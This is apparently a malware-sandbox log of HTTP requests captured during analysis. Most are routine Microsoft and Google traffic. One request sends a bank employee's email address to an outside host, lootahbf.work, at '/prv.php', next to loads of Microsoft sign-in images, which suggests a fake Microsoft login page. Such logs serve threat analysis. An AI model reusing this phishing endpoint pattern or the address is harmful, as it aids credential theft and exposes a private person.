Source: global traffic HTTP traffic detected: GET /image/apps.15881.13753891519397067.8011a592-e549-44a6-8073-41dcd83eddbe.bcf361e4-21f7-429d-877a-6c55c1b655ff?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.10288.13753891519397067.8011a592-e549-44a6-8073-41dcd83eddbe.12bb65f7-1014-4469-bb2e-59f575e79b05?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.256.14495311847124170.e89a4dce-fd9a-4a10-b8e4-a6c3aa1c055e.ca4cbefc-0ab0-4144-90c1-07f5250c8c21?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.20893.13571498826857201.00a9d390-581f-492c-b148-b2ce81649480.acc28f88-50de-4aaf-abfc-ad1da8b04cd0?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
  Host: aadcdn.msftauth.net
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
  Host: clients2.google.com
  Connection: keep-alive
  X-Goog-Update-Interactivity: fg
  X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm
  X-Goog-Update-Updater: chromecrx-85.0.4183.121
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
  Host: aadcdn.msauth.net
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1
  Host: aadcdn.msauth.net
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
  Host: aadcdn.msftauth.net
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /prv.phpbsalazar@redriverbank.net HTTP/1.1
  Host: lootahbf.work
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: */*
  Origin: null
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
  Host: aadcdn.msftauth.net
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
  Host: aadcdn.msauth.net
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
  Host: aadcdn.msftauth.net
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
  Host: aadcdn.msauth.net
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msftauth.netIf-Modified-Since: Thu, 16 Jan 2020 00:32:52 GMTIf-None-Match: 0x8D79A1B9F5E121A
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msauth.netIf-Modified-Since: Fri, 17 Jan 2020 19:28:34 GMTIf-None-Match: 0x8D79B8371B97A82
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msftauth.netIf-Modified-Since: Wed, 12 Feb 2020 22:01:50 GMTIf-None-Match: 0x8D7B007297AE131
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msauth.netIf-Modified-Since: Tue, 10 Nov 2020 03:41:24 GMTIf-None-Match: 0x8D8852A7FA6B761
Source: global traffic HTTP traffic detected: GET /image/apps.39478.14495311847124170.e89a4dce-fd9a-4a10-b8e4-a6c3aa1c055e.8ad1b690-ff36-44fa-8afc-0dc5bed1273c?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.40093.9007199266285780.3d16d9fa-052b-42c5-ba7d-a5688e3dda24.e6964d6a-18a4-4746-9238-9f0acc233a65?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Thu, 20 Apr 2017 16:10:39 GMT
  User-Agent: Microsoft BITS/7.8
  Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /image/apps.49525.13510798887047136.8a1815b2-017c-48c8-80cc-ca4d1ae5c8cf.2f6b9bdf-a4fc-42d8-aea0-65c437755b78?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.58298.9007199266285780.3d16d9fa-052b-42c5-ba7d-a5688e3dda24.55988ee1-bd9b-4322-980a-a610abdc7713?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.616.13510798887047136.8a1815b2-017c-48c8-80cc-ca4d1ae5c8cf.d81cfd95-c9fd-48e0-8fc3-36ff7b9e590a?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.15982.13510798883386282.38bb6176-27af-4000-85dd-12a4c12514f2.7bbbe321-5273-45d0-814e-74f2065197d3?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.64128.9007199266246227.c596c546-6fcb-4260-935c-19bc24b971ef.d58015ff-2fcf-4113-975b-e873039b6d86?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.16957.14618985536919905.4b30e4f3-f7a1-4421-840c-2cc97b10e8e0.aef04b90-a221-4ea5-a05d-0d51ac792471?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.18124.9007199266244427.c75d2ced-a383-40dc-babd-1ad2ceb13c86.afc6c372-c7a8-4eda-94fb-541bbb081d14?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.31225.13576748414566955.3d986480-8c1e-4271-9c7c-a90619002084.3ffd9abd-094d-4594-b6c3-8e079298b84b?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.31660.13925855090824389.09f473d9-ce97-499c-9d53-c21e8f64ee62.9cf7ca2f-497e-4cb1-be08-431c9fcc4d54?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.32938.13925855090824389.09f473d9-ce97-499c-9d53-c21e8f64ee62.721cfb02-7935-45dc-9d66-2d6e6b2ff76c?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.38957.9007199266246761.3059e916-5e99-4797-a868-366cc8761e37.dcc9368c-4c77-41a2-b867-8514435d8418?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.39016.9007199266243744.36dde9d0-f21a-47d2-976e-f1ea3f5b031f.bbea1229-a466-4a8c-b428-57cb58abf084?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.41671.13634052595610511.c45457c9-b4af-46b0-8e61-8d7c0aec3f56.86b1d82d-8b47-4bda-99fc-8a1db0a7ac9d?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.5075.9007199266244427.c75d2ced-a383-40dc-babd-1ad2ceb13c86.f329a73d-1ae8-4445-aa4c-bf40f3c5d62d?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.51843.9007199266243449.90709ce3-050c-4cef-8d4a-9ef213b89ef2.c13e8407-eaf8-447a-a5d6-9abd8bc2c1f3?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.52481.9007199266243744.36dde9d0-f21a-47d2-976e-f1ea3f5b031f.16c0a704-aef8-4bc4-af36-0c3b3ee0f6e2?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.54145.14618985536919905.4b30e4f3-f7a1-4421-840c-2cc97b10e8e0.0df01b4e-7fca-47eb-b3d7-95ba7990754d?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.54562.13634052595610511.c45457c9-b4af-46b0-8e61-8d7c0aec3f56.24af4abe-62f8-404b-b1a9-ee8fe4d32d94?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.55990.13510798886747090.a0953092-5fc3-46f0-aefa-796cb3a9b90b.1c9f2174-7e18-48ba-af90-e569a2444a83?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.56668.13510798883386282.38bb6176-27af-4000-85dd-12a4c12514f2.a2d9522a-f7d1-4f21-9ea4-8ba298101695?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.58878.9007199266246761.3059e916-5e99-4797-a868-366cc8761e37.21987aba-4948-4f44-bf2e-eba90517f1c5?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.59367.13510798885854323.dbec43fa-fcea-4036-9b1c-96de66922c18.da850a8e-5b3f-49fd-b3dc-6a8c0db400e4?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.65344.13576748414566955.3d986480-8c1e-4271-9c7c-a90619002084.2a7e9f85-6e2d-4bc7-ad81-13196f5baf00?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.7873.9007199266243449.90709ce3-050c-4cef-8d4a-9ef213b89ef2.7885dc21-4015-4284-a596-d3d24cf6c1b8?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.62687.13510798885854323.6a8c11ad-84e9-4247-9ba9-ab3742bdbb87.e61dfadd-3bdd-4f66-beb1-6bb763b60b02?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.8341.13510798886747090.a0953092-5fc3-46f0-aefa-796cb3a9b90b.fc0c6be7-c064-44dc-a7df-81e7097e3c93?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225155Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=c5b34f363e4a4227b6cb30ca1e71d217&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513697&metered=false&nettype=ethernet&npid=sc-338389&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513697&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
  Accept-Encoding: gzip, deflate
  X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6
  X-SDK-HW-TOKEN: t=[removed]&p=
  Cache-Control: no-cache
  MS-CV: dI8PgNjo+ke0xboL.0
  User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
  X-SDK-HWF: tch0,m301,m751,mA01,mT01
  Host: arc.msn.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225154Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=9a92f4708df84c9781d2e66fe154310e&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513697&metered=false&nettype=ethernet&npid=sc-280815&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513697&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
  Accept-Encoding: gzip, deflate
  X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6
  X-SDK-HW-TOKEN: t=[removed]&p=
  Cache-Control: no-cache
  MS-CV: dI8PgNjo+ke0xboL.0
  User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
  X-SDK-HWF: tch0,m301,m751,mA01,mT01
  Host: arc.msn.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225229Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=eee2c6e085ac4c5eb6bf46697882ac06&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513697&metered=false&nettype=ethernet&npid=sc-338387&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&rver=2&sc-mode=0&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513697&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
  Accept-Encoding: gzip, deflate
  X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6
  X-SDK-HW-TOKEN: t=[removed]&p=
  Cache-Control: no-cache
  MS-CV: dI8PgNjo+ke0xboL.0
  User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
  X-SDK-HWF: tch0,m301,m751,mA01,mT01
  Host: arc.msn.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225230Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=6db5913ae0134561b048b700e0a37ba0&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513697&metered=false&nettype=ethernet&npid=sc-338388&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513697&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
  Accept-Encoding: gzip, deflate
  X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6
  X-SDK-HW-TOKEN: t=[removed]&p=
  Cache-Control: no-cache
  MS-CV: dI8PgNjo+ke0xboL.0
